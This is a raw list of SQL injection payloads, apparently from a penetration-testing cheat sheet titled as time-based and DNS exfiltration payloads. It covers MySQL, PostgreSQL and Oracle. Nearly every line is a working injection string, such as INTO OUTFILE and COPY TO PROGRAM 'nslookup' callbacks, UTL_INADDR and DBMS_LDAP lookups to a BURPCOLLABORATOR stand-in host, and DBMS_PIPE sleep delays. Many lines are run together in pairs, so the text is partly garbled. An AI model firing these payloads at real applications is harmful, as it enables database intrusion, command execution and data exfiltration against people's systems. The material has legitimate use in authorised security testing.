`));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
')));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- `)));SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
";COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- )+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
");COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- )))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
'+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
"));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ')+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
'))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
")));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ')))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
"+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`;COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ")+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
"))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`);COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- ")))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- `)+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
`)));COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR'+-- `)))+UNION+SELECT+1+INTO+OUTFILE+'\\BURPCOLLABORATOR\x'+--+
+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
;(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- )+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
);(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- )))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
'+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ')+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
'))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
)));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ')))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
"+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
';(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ")+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
"))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
');(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ")))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
`+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
'));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- `)+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
`))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
')));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- `)))+AND+(SELECT+1+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x')+--+
+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
";(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- )+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
");(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- )))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
'+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
"));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ')+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
'))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
")));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ')))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
"+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`;(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ")+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
"))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`);(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- ")))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- `)+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
`)));(COPY+(SELECT+'')+TO+PROGRAM+'nslookup+BURPCOLLABORATOR')+-- `)))+INTO+OUTFILE+'\\\\BURPCOLLABORATOR\\x'+--+
SQL Injection
4 - TIME-Based AND DNS Exfiltration SQL Injection Payloads

Oracle

;SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
);SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
)));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
';SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
');SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
'));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
')));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
";SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
");SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
"));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
")));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`;SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`);SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`)));SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
)+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
)))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
'+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
')+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
'))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- ')))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
)+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- "+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- ")+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
)))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- "))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- ")))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
')+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- `+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
'))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- `)+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
')))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- `))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
"+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- `)))+AND+1=(SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR'))+--
")+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- +UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
"))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- )+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
")))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- ))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- )))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`)+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- '+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- ')+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
`)))+AND+1=DBMS_PIPE.RECEIVE_MESSAGE('1',15)+-- '))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ')))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
)+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- "+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ")+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
)))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- "))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
'+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ")))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
')+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- `+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
'))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- `)+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
')))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- `))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
"+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- `)))+UNION+SELECT+UTL_INADDR.GET_HOST_ADDRESS('BURPCOLLABORATOR')+--
")+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ;SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- );SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- )));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ';SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- ');SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)))+AND+123=(CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END)+-- '));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
;DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ')));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
);DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ";SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ");SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- "));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
';DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ")));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
');DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- `;SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- `);SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- `));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
";DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- `)));SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
");DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- +AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
"));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- )+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
")));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`;DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- )))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`);DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- '+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- ')+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`)));DBMS_PIPE.RECEIVE_MESSAGE('x',15)+-- '))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
;SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ')))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
);SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- "+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ")+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
)));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- "))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
';SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ")))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
');SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
'));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `)+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
')));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
";SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `)))+AND+1=(SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
");SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- +UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- )+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`;SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- )))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`);SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- '+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ')+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)));SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- '))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ')))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- "+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ")+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- "))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ")))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- `+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- `)+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- `))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- `)))+UNION+SELECT+SYS.DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ;SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- );SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- )));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ';SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- ');SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
`)))+AND+1=(SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL)+-- '));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ')));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ";SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ");SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
)))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- "));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ")));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `;SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
'))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `);SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
')))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
"+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- `)));SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
")+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- +AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
"))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- )+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
")))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- )))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`)+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- '+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- ')+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
`)))+UNION+SELECT+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+FROM+DUAL+-- '))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
;SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ')))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
);SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- "+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ")+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
)));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- "))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
';SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- ")))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
');SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
'));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `)+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
')));SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
";SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- `)))+AND+1=(SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80'))+--
");SELECT+CASE+WHEN+(1=1)+THEN+DBMS_PIPE.RECEIVE_MESSAGE('x',15)+ELSE+123+END+FROM+DUAL+-- +UNION+SELECT+DBMS_LDAP.INIT('BURPCOLLABORATOR,80')+--
